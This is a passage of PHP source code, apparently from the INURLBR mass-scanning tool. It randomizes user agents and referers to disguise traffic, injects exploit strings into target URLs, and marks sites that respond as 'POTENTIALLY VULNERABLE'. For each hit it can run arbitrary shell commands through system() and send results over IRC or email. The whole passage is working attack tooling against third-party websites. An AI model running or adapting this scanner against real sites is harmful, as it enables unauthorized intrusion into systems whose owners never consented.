  1793.         'acc_html_mark', 'acc_html_rand', 'acc_lan_page', 'acc_pic_html', 'acc_profol', 'acc_soft_link', 'acc_ssd_page', 'acc_syun_ei', 'german', 'intranet', 'old',
  1794.         'acc_time_go', 'acc_wbcreator', 'accept', 'accepted', 'acceso', 'access', 'accessibility', 'accessories', 'acciones', 'acclg', 'account', 'paste', 'paste22',
  1795.         'acessorios', 'acontece', 'acougueiro', 'acoustic', 'act', 'action', 'activate', 'active', 'activeden', 'activism', 'actualit', 'actuators', 'ad', 'informatica',
  1796.         'ad_division', 'ad_rate', 'adapter', 'adapters', 'adaptive', 'adaptivei', 'adatmentes', 'adbanner', 'adblock', 'adboard', 'adclick', 'add-ons', 'add', 'delete',
  1797.         'added', 'addon', 'address', 'adduser', 'adfree', 'adhoc', 'adinfo', 'adios_papa', 'adlink', 'adlinks', 'acc_folder_vw', 'acc_syun_su',
  1798.     );
  1799.  
  1800.     $locais = array('ac', 'ad', 'ae', 'af', 'ag', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'as', 'at', 'au', 'aw', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn',
  1801.         'bw', 'by', 'bz', 'ca', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'bo', 'br',
  1802.         'ec', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'bs', 'bt',
  1803.         'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'bv',
  1804.         'kh', 'ki', 'km', 'kn', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mk', 'ml',
  1805.         'mm', 'mn', 'mo', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'nb', 'nc', 'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om',
  1806.         'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si',
  1807.         'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'ss', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tr', 'tt', 'tv',
  1808.         'tw', 'tz', 'ua', 'ug', 'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'yu', 'za', 'zm', 'zw', 'ai',
  1809.     );
  1810.     return "http://www." . strtolower($dominio[rand(0, count($dominio) - 1)]) . ".{$gTLD[rand(0, count($gTLD) - 1)]}.{$locais[rand(0, count($locais) - 1)]}/{$pasta[rand(0, count($pasta) - 1)]}/{$arquivo[rand(0, count($arquivo) - 1)]}.{$ext[rand(0, count($ext) - 1)]}";
  1811. }
  1812.  
  1813. ################################################################################
  1814. #GENERATE AGENT BROWSER random##################################################
  1815. ################################################################################
  1816.  
  1817. function __setUserAgentRandom() {
  1818.  
  1819.     $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
  1820.         'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse',
  1821.         'K-Meleon', 'GoogleBot', 'Konqueror', 'Minimo', 'Googlebot', 'WeltweitimnetzBrowser', 'SuperBot', 'TerrawizBot', 'YodaoBot', 'Wyzo', 'Grail',
  1822.         'PycURL', 'Galaxy', 'EnigmaFox', '008', 'ABACHOBot', 'Bimbot', 'Covario IDS', 'iCab', 'KKman', 'Oregano', 'WorldWideWeb', 'Wyzo', 'GNU IceCat',
  1823.         'Vimprobable', 'uzbl', 'Slim Browser', 'Flock', 'OmniWeb', 'Rockmelt', 'Shiira', 'Swift', 'Pale Moon', 'Camino', 'Flock', 'Galeon', 'Sylera'
  1824.     );
  1825.  
  1826.     $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
  1827.         'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
  1828.         'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
  1829.         'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu',
  1830.         'Fluxbuntu', 'Freespire', 'GNewSense', 'Gobuntu', 'gOS', 'Mint Linux', 'Kubuntu', 'Xubuntu', 'ZeVenOS', 'Zebuntu', 'DemoLinux',
  1831.         'Dreamlinux', 'DualOS', 'eLearnix', 'Feather Linux', 'Famelix', 'FeniX', 'Gentoo', 'GoboLinux', 'GNUstep', 'Insigne Linux',
  1832.         'Kalango', 'KateOS', 'Knoppix', 'Kurumin', 'Dizinha', 'TupiServer', 'Linspire', 'Litrix', 'Mandrake', 'Mandriva', 'MEPIS',
  1833.         'Musix GNU Linux', 'Musix-BR', 'OneBase Go', 'openSuSE', 'pQui Linux', 'PCLinuxOS', 'Plaszma OS', 'Puppy Linux', 'QiLinux',
  1834.         'Red Hat Linux', 'Red Hat Enterprise Linux', 'CentOS', 'Fedora', 'Resulinux', 'Rxart', 'Sabayon Linux', 'SAM Desktop', 'Satux',
  1835.         'Slackware', 'GoblinX', 'Slax', 'Zenwalk', 'SuSE', 'Caixa Mágica', 'HP-UX', 'IRIX', 'OSF/1', 'OS-9', 'POSYS', 'QNX', 'Solaris',
  1836.         'OpenSolaris', 'SunOS', 'SCO UNIX', 'Tropix', 'EROS', 'Tru64', 'Digital UNIX', 'Ultrix', 'UniCOS', 'UNIflex', 'Microsoft Xenix',
  1837.         'z/OS', 'Xinu', 'Research Unix', 'InfernoOS'
  1838.     );
  1839.  
  1840.     $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
  1841.         'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
  1842.         'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
  1843.         'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
  1844.         'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE',
  1845.         'de_LU', 'de_CH', 'de', 'el_CY', 'el_GR', 'el', 'iw_IL', 'iw', 'hi_IN', 'hu_HU', 'hu', 'is_IS', 'is', 'in_ID', 'in', 'ga_IE',
  1846.         'ga', 'it_IT', 'it_CH', 'it', 'ja_JP', 'ja_JP_JP', 'ja', 'ko_KR', 'ko', 'lv_LV', 'lv', 'lt_LT', 'lt', 'mk_MK', 'mk', 'ms_MY',
  1847.         'ms', 'mt_MT', 'mt', 'no_NO', 'no_NO_NY', 'no', 'pl_PL', 'pl', 'pt_PT', 'pt', 'ro_RO', 'ro', 'ru_RU', 'ru', 'sr_BA', 'sr_ME',
  1848.         'sr_CS', 'sr_RS', 'sr', 'sk_SK', 'sk', 'sl_SI', 'sl', 'es_AR', 'es_BO', 'es_CL', 'es_CO', 'es_CR', 'es_DO', 'es_EC', 'es_SV',
  1849.         'es_GT', 'es_HN', 'es_MX', 'es_NI', 'es_PA', 'es_PY', 'es_PE', 'es_PR', 'es_ES', 'es_US', 'es_UY', 'es_VE', 'es', 'sv_SE',
  1850.         'sv', 'th_TH', 'th_TH_TH', 'th', 'tr_TR', 'tr', 'uk_UA', 'uk', 'vi_VN', 'vi'
  1851.     );
  1852.     return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
  1853. }
  1854.  
  1855. ################################################################################
  1856. #RESPONSIBLE FOR RUN COMMANDS IN TERMINAL the installation of facilities########
  1857. ################################################################################
  1858.  
  1859. function __installDepencia() {
  1860.  
  1861.     echo __bannerlogo() . __plus();
  1862.     echo "\n{$_SESSION["c15"]}|_[ * ]__{$_SESSION["c0"]}\n";
  1863.     echo "         {$_SESSION["c15"]}|[EXTERNAL COMMAND INSTALLING PREMISES ]:: {$_SESSION["c11"]}\n";
  1864.     $dados = system("sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl", $dados) . __plus();
  1865.     sleep(1) . __plus();
  1866.     echo "{$_SESSION["c0"]}";
  1867.     if (empty($dados)) {
  1868.  
  1869.         return FALSE;
  1870.     }
  1871.     unset($dados);
  1872.     exit();
  1873. }
  1874.  
  1875. ################################################################################
  1876. #RESPONSIBLE FOR RUN COMMANDS IN TERMINAL#######################################
  1877. ################################################################################
  1878.  
  1879. function __command($commando, $alvo) {
  1880.  
  1881.     if (!is_null($commando)) {
  1882.  
  1883.         (strstr($commando, '_TARGET_') ||
  1884.                 strstr($commando, '_TARGETFULL_') ||
  1885.                 strstr($commando, '_TARGETIP_') ||
  1886.                 strstr($commando, '_EXPLOIT_') ||
  1887.                 strstr($commando, '_URI_') ||
  1888.                 strstr($commando, '_URI_') ||
  1889.                 strstr($commando, '_PORT_') ||
  1890.                 strstr($commando, '_RANDOM_') ? NULL :
  1891.                         __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c2"]}SET PARAMETER - command correctly{$_SESSION["c0"]}\n"));
  1892.  
  1893.         $uri = parse_url($alvo['url_xpl']);
  1894.  
  1895.         $command[0] = str_replace("_TARGET_", "{$_SESSION["c8"]}" . __filterHostname($alvo['url_xpl']) . "{$_SESSION["c1"]}", $commando);
  1896.         $command[0] = str_replace('_TARGETIP_', "{$_SESSION["c9"]}{$_SESSION['config']['server_ip']}{$_SESSION["c1"]}", $command[0]);
  1897.         $command[0] = str_replace('_TARGETFULL_', "{$_SESSION["c14"]}{$alvo['url_clean']}{$_SESSION["c1"]}", $command[0]);
  1898.         $command[0] = str_replace('_TARGETXPL_', "{$_SESSION["c14"]}{$alvo['url_xpl']}{$_SESSION["c1"]}", $command[0]);
  1899.         $command[0] = str_replace("_EXPLOIT_", "{$_SESSION["c6"]}{$_SESSION['config']['exploit-command']}{$_SESSION["c1"]}", $command[0]);
  1900.         $command[0] = str_replace('_URI_', "{$_SESSION["c8"]}{$uri['path']}{$_SESSION["c1"]}", $command[0]);
  1901.         $command[0] = str_replace('_PORT_', "{$_SESSION["c9"]}{$alvo['url_port']}{$_SESSION["c1"]}", $command[0]);
  1902.         $command[0] = str_replace('_RANDOM_', "{$_SESSION["c15"]}" . random(5) . "{$_SESSION["c1"]}", $command[0]);
  1903.  
  1904.         $command[0] = __crypt($command[0]);
  1905.  
  1906.         $command[1] = str_replace("_TARGET_", __filterHostname($alvo['url_clean']), $commando);
  1907.         $command[1] = str_replace('_TARGETIP_', $_SESSION['config']['server_ip'], $command[1]);
  1908.         $command[1] = str_replace('_TARGETFULL_', $alvo['url_clean'], $command[1]);
  1909.         $command[1] = str_replace('_TARGETXPL_', $alvo['url_xpl'], $command[1]);
  1910.         $command[1] = str_replace("_EXPLOIT_", $_SESSION['config']['exploit-command'], $command[1]);
  1911.         $command[1] = str_replace("_URI_", $uri['path'], $command[1]);
  1912.         $command[1] = str_replace("_PORT_", $alvo['url_port'], $command[1]);
  1913.         $command[1] = str_replace("_RANDOM_", random(5), $command[1]);
  1914.         $command[1] = str_replace("\n", '', str_replace("\r", '', $command[1]));
  1915.  
  1916.         $command[1] = __crypt($command[1]);
  1917.  
  1918.         echo "\n{$_SESSION["c1"]}|_[ * ]__\n";
  1919.         echo "         |[ EXTERNAL COMMAND ]:: {$command[0]}{$_SESSION["c11"]}\n";
  1920.         $_ = array(0 => ($_SESSION['config']['popup']) ? 'sudo xterm -geometry 134x50+1900+0 -title "Auxiliary Window - INURLBR / COMMAND" -e ' : NULL, 1 => ($_SESSION['config']['popup']) ? ' > /dev/null &' : NULL);
  1921.         echo ($_SESSION['config']['popup'] ? "\t[!] opening auxiliary window...\n" : NULL);
  1922.         $dados = system($_[0] . $command[1] . $_[1], $dados);
  1923.         sleep(1) . __plus();
  1924.  
  1925.         echo $_SESSION["c0"];
  1926.     }
  1927.     if (empty($dados[0])) {
  1928.  
  1929.         return FALSE;
  1930.     }
  1931.     unset($dados);
  1932. }
  1933.  
  1934. ################################################################################
  1935. #FILTER BY TAKING ONLY RESPONSIBLE URL HOSTNAME#################################
  1936. ################################################################################
  1937.  
  1938. function __filterHostname($url) {
  1939.  
  1940.     $alvo_ = NULL;
  1941.     //#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i - 1.0
  1942.     preg_match_all('@^(?:(ht|f)tps?://*)?([^/]+)@i', $url, $alvo_);
  1943.     return str_replace("/", '', str_replace("ftps:", '', str_replace("ftp:", '', str_replace("https:", '', str_replace("http:", '', $alvo_[0][0])))));
  1944. }
  1945.  
  1946. ################################################################################
  1947. #RESPONSIBLE FOR ALL REQUESTS GET / POST THE SCRIPT#############################
  1948. ################################################################################
  1949. /*
  1950.   curl_multi_init — Returns a new cURL multi handle
  1951.   (PHP 5) http://php.net/manual/en/function.curl-multi-init.php
  1952.  */
  1953.  
  1954. function __request_info($url_, $proxy = NULL, $postDados = NULL) {
  1955.  
  1956.     $url_ = __crypt($url_);
  1957.     $mh = curl_multi_init();
  1958.     $curl_array = array();
  1959.     $nodes = is_array($url_) ? $url_ : array($url_);
  1960.  
  1961.     foreach ($nodes as $i => $url) {
  1962.  
  1963.         $curl_array[$i] = curl_init($url);
  1964.  
  1965.         __plus();
  1966.  
  1967.         //FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST.
  1968.         if (not_isnull_empty($postDados) && is_array($postDados)) {
  1969.  
  1970.             foreach ($postDados as $campo => $valor) {
  1971.  
  1972.                 $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
  1973.             }
  1974.  
  1975.             $postDados_format = rtrim($postDados_format, '&');
  1976.             curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
  1977.             curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
  1978.         }
  1979.  
  1980.         curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ?
  1981.                                 explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
  1982.         curl_setopt($curl_array[$i], CURLOPT_USERAGENT, (not_isnull_empty($_SESSION['config']['user-agent'])) ?
  1983.                         __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
  1984.         curl_setopt($curl_array[$i], CURLOPT_REFERER, (not_isnull_empty($_SESSION['config']['url-reference'])) ?
  1985.                         __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
  1986.  
  1987.         (!is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL);
  1988.         (!is_null($_SESSION['config']['verifica_info'])) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
  1989.         (!is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ?
  1990.                         curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL);
  1991.  
  1992.         __plus();
  1993.         curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
  1994.         curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
  1995.         curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
  1996.         curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
  1997.  
  1998.         curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
  1999.                         $_SESSION['config']['time-out'] : 5);
  2000.  
  2001.         curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ?
  2002.                         $_SESSION['config']['time-out'] : 5);
  2003.  
  2004.         curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ?
  2005.                         $_SESSION['config']['file-cookie'] : 'cookie.txt');
  2006.  
  2007.         curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ?
  2008.                         $_SESSION['config']['file-cookie'] : 'cookie.txt');
  2009.  
  2010.         curl_multi_add_handle($mh, $curl_array[$i]);
  2011.     }
  2012.     $running = NULL;
  2013.     do {
  2014.  
  2015.         usleep(100);
  2016.         curl_multi_exec($mh, $running);
  2017.     } while ($running > 0);
  2018.     $ret = array();
  2019.     foreach ($nodes as $i => $url) {
  2020.  
  2021.         $ret[0] = curl_multi_getcontent($curl_array[$i]);
  2022.         $ret[1] = curl_getinfo($curl_array[$i]);
  2023.         $ret[2] = curl_error($curl_array[$i]);
  2024.     }
  2025.     foreach ($nodes as $i => $url) {
  2026.         curl_multi_remove_handle($mh, $curl_array[$i]);
  2027.     }
  2028.  
  2029.     $status = NULL;
  2030.     preg_match_all('(HTTP.*)', $ret[0], $status['http']);
  2031.     preg_match_all('(Server:.*)', $ret[0], $status['server']);
  2032.     preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
  2033.  
  2034.     __plus();
  2035.     $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}  {$status['X-Powered-By'][0][0]}"));
  2036.     __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
  2037.  
  2038.     __plus();
  2039.     __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
  2040.  
  2041.     __plus();
  2042.     curl_multi_close($mh) . unlink('cookie.txt');
  2043.  
  2044.     __plus();
  2045.     unset($curl_array);
  2046.     return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
  2047. }
  2048.  
  2049. ################################################################################
  2050. #CAPTURE INFORMATION SERVER AND VALIDATE FAULTS#################################
  2051. ################################################################################
  2052.  
  2053. function __infoServer($url_, $postDados = NULL) {
  2054.  
  2055.     __plus();
  2056.     $_SESSION['config']['verifica_info'] = 1;
  2057.     $resultado = __request_info($url_, $_SESSION["config"]["proxy"], $postDados);
  2058.     __plus();
  2059.     if (isset($resultado['corpo'])) {
  2060.         if (!is_null($_SESSION['config']['extrai-email'])) {
  2061.  
  2062.             __plus();
  2063.             return __extractEmail($resultado['corpo'], $url_);
  2064.         }
  2065.  
  2066.         if (!is_null($_SESSION['config']['extrai-url'])) {
  2067.  
  2068.             __plus();
  2069.             return __extractURLs($resultado['corpo'], $url_);
  2070.         }
  2071.  
  2072.         if (not_isnull_empty($_SESSION['config']['regexp-filter'])) {
  2073.  
  2074.             __plus();
  2075.             return __extractRegCustom($resultado['corpo'], $url_);
  2076.         }
  2077.  
  2078.         if (not_isnull_empty($_SESSION['config']['target']) && $_SESSION['config']['tipoerro'] == 5) {
  2079.  
  2080.             __plus();
  2081.             return __checkURLs($resultado, $url_);
  2082.         }
  2083.  
  2084.         $ifcode = not_isnull_empty($_SESSION['config']['ifcode']) &&
  2085.                 strstr($resultado['server']['http_code'], $_SESSION['config']['ifcode']) ?
  2086.                 "CODE_HTTP_FOUND: {$_SESSION['config']['ifcode']} / " : NULL;
  2087.  
  2088.  
  2089.         $ifredirect = not_isnull_empty($_SESSION['config']['ifredirect']) &&
  2090.                 (strstr($resultado['server']['redirect_url'], $_SESSION['config']['ifredirect'])) ?
  2091.                 'VALUE URL REDIRECT FOUND' : NULL;
  2092.  
  2093.         $_SESSION['config']['erroReturn'] = $ifredirect . $ifcode . __checkError($resultado['corpo']);
  2094.         __plus();
  2095.         $_SESSION['config']['curl_getinfo'] = $resultado['server'];
  2096.         $_SESSION['config']['error_conection'] = (not_isnull_empty($resultado['error']) ? $resultado['error'] : NULL);
  2097.         $_SESSION['config']['server_ip'] = (!is_null($resultado['server']['primary_ip']) ? $resultado['server']['primary_ip'] : NULL);
  2098.         $_SESSION['config']['vull_style'] = (not_isnull_empty($_SESSION['config']['erroReturn'])) ?
  2099.                 "{$_SESSION["c4"]}( POTENTIALLY VULNERABLE ){$_SESSION["c0"]}  \033[1m \033[32m" . __cli_beep() : NULL;
  2100.         $_SESSION['config']['resultado_valores'].=(not_isnull_empty($_SESSION['config']['erroReturn'])) ? "{$url_}\n" : NULL;
  2101.         __plus();
  2102.         $url_ = ($_SESSION['config']['alexa-rank']) ? ", RANK ALEXA: " . __positionAlexa($url_) : NULL;
  2103.         __plus();
  2104.         $_SESSION['config']['info_ip'] = __infoIP($resultado['server']['primary_ip'], 1);
  2105.         __plus();
  2106.     } else {
  2107.         return FALSE;
  2108.     }
  2109.     __plus();
  2110.  
  2111.     return "{$resultado['info']}, IP:{$resultado['server']['primary_ip']}:{$resultado['server']['primary_port']} {$url_}";
  2112. }
  2113.  
  2114. ################################################################################
  2115. #ERROR MAIN PROCESS RESPONSIBLE FOR ALL VALIDATION OF MOTOR#####################
  2116. ################################################################################
  2117.  
  2118. function __processUrlExec($url, $contUrl) {
  2119.  
  2120.     __plus();
  2121.     if (is_null($url) || empty($url)) {
  2122.  
  2123.         return FALSE;
  2124.     }
  2125.  
  2126.     $host = (!is_null($_SESSION['config']['replace'])) ?
  2127.             __replace($_SESSION['config']['replace'], urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url))) :
  2128.             urldecode($_SESSION['config']['tipoerro'] == 3 ? __filterHostname($url) : ($url));
  2129.  
  2130.     $target_['url_xpl'] = __remove($_SESSION['config']['remove'], __mountURLExploit(!is_null($_SESSION['config']['url']) ? $_SESSION['config']['url'] . $host : $host));
  2131.     $info = __infoServer($target_['url_xpl'], $_SESSION['config']['exploit-post']);
  2132.     $target_['url_clean'] = ($_SESSION['config']['tipoerro'] == 4) ? $_SESSION['config']['url'] . $host : urldecode($url);
  2133.  
  2134.     __plus();
  2135.  
  2136.     if ($_SESSION['config']['tipoerro'] != 5 && is_null($_SESSION['config']['extrai-email']) &&
  2137.             is_null($_SESSION['config']['extrai-url']) && is_null($_SESSION['config']['regexp-filter'])) {
  2138.  
  2139.         $ifredirect = strstr($_SESSION['config']['curl_getinfo']['redirect_url'], $_SESSION['config']['ifredirect']) ?
  2140.                 "{$_SESSION["c4"]}{$_SESSION['config']['curl_getinfo']['redirect_url']}" : NULL;
  2141.         $exget = (not_isnull_empty($_SESSION['config']['exploit-get']) ? ' _/GET=> ' . $_SESSION['config']['exploit-get'] : NULL);
  2142.         $expost = (not_isnull_empty($_SESSION['config']['exploit-post']) ? ' _/POST=> ' . $_SESSION['config']['exploit-post_str'] : NULL);
  2143.         $valid_return = (not_isnull_empty($_SESSION['config']['erroReturn'])) ? TRUE : FALSE;
  2144.         $info = ($valid_return) ? "{$_SESSION["c4"]}{$info}" : $info;
  2145.         $target_ip = ($valid_return) ? "{$_SESSION["c4"]}{$_SESSION['config']['info_ip']}" : $_SESSION['config']['info_ip'];
  2146.  
  2147.         $anime = ($valid_return) ? '[ ! ]' : '[ - ]';
  2148.         echo __plus() . "\n";
  2149.  
  2150.         echo "{$_SESSION["c1"]}{$_SESSION['config']['line']}{$_SESSION["c0"]}\n";
  2151.         echo "{$_SESSION["c1"]}|_[ + ] [{$_SESSION["c1"]} {$contUrl} / {$_SESSION['config']['total_url']} {$_SESSION["c1"]}]{$_SESSION["c9"]}-[" . date("H:i:s") . "]{$_SESSION["c1"]} {$anime} {$_SESSION["c0"]}\n";
  2152.         echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Target:: {$_SESSION["c1"]}[{$_SESSION["c9"]} {$_SESSION['config']['vull_style']}{$target_['url_clean']}{$_SESSION["c1"]} ]{$_SESSION["c0"]}\n";
  2153.         echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Exploit:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$exget}{$expost}{$_SESSION["c0"]}\n";
  2154.         echo (not_isnull_empty($_SESSION['config']['replace'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Replace:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['replace']}{$_SESSION["c0"]}\n") : NULL;
  2155.         echo (not_isnull_empty($_SESSION['config']['remove'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Remove:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['remove']}{$_SESSION["c0"]}\n") : NULL;
  2156.         echo (isset($_SESSION['config']['cms-check-resultado'])) ? ("{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}CMS check:: {$_SESSION["c0"]}{$_SESSION["c3"]}{$_SESSION['config']['cms-check-resultado']}{$_SESSION["c0"]}\n") : NULL;
  2157.         echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Information Server:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$info}{$_SESSION["c1"]}\n";
  2158.         echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}More details:: {$_SESSION["c0"]}{$_SESSION["c9"]}{$target_ip}{$_SESSION["c1"]}\n";
  2159.         echo "{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}Found:: {$_SESSION["c9"]}" . ($valid_return ? "{$_SESSION["c4"]}{$_SESSION['config']['erroReturn']}" : "UNIDENTIFIED") . "{$_SESSION["c0"]}";
  2160.         echo (not_isnull_empty($ifredirect) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}URL REDIRECT:: {$_SESSION["c9"]}{$ifredirect}{$_SESSION["c0"]}" : NULL);
  2161.         echo (not_isnull_empty($_SESSION['config']['error_conection']) ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}ERROR CONECTION:: {$_SESSION["c2"]}{$_SESSION['config']['error_conection']}{$_SESSION["c0"]}" : NULL);
  2162.         ($valid_return ? __saveValue($_SESSION['config']['arquivo_output'], $target_['url_xpl'], 1) : NULL);
  2163.         echo ($_SESSION['config']['sendmail'] ? "\n{$_SESSION["c1"]}|_[ + ] {$_SESSION["c0"]}{$_SESSION["c7"]}SEND MAIL:: {$_SESSION["c9"]}" . (($valid_return) ? "{$_SESSION["c4"]}" : NULL) . __sendMail($_SESSION['config']['sendmail'], $target_['url_xpl']) . "{$_SESSION["c0"]}" : NULL);
  2164.         (not_isnull_empty($_SESSION['config']['arquivo_output_all']) ? __saveValue($_SESSION['config']['arquivo_output_all'], $target_['url_xpl'], NULL) : NULL);
  2165.         __plus();
  2166.  
  2167.         if ($valid_return) {
  2168.  
  2169.             (not_isnull_empty($_SESSION['config']['irc']['irc_connection']) ?
  2170.                             __ircMsg($_SESSION['config']['irc'], "{$_SESSION['config']['erroReturn']}::: {$target_['url_xpl']}") : NULL);
  2171.             __plus();
  2172.  
  2173.             (not_isnull_empty($_SESSION['config']['command-vul']) ? __command($_SESSION['config']['command-vul'], $target_) : NULL);
  2174.             __plus();
  2175.  
  2176.             (not_isnull_empty($_SESSION['config']['exploit-vul-id']) ?
  2177.                             __configExploitsExec($_SESSION['config']['exploit-vul-id'], $target_) : NULL);
  2178.             __plus();
  2179.         }
  2180.  
  2181.         (not_isnull_empty($_SESSION['config']['command-all']) ? __command($_SESSION['config']['command-all'], $target_) : NULL);
  2182.         __plus();
  2183.  
  2184.         (not_isnull_empty($_SESSION['config']['sub-file']) &&
  2185.                 is_array($_SESSION['config']['sub-file']) ? __subExecExploits($target_['url_xpl'], $_SESSION['config']['sub-file']) : NULL);
  2186.         __plus();
  2187.  
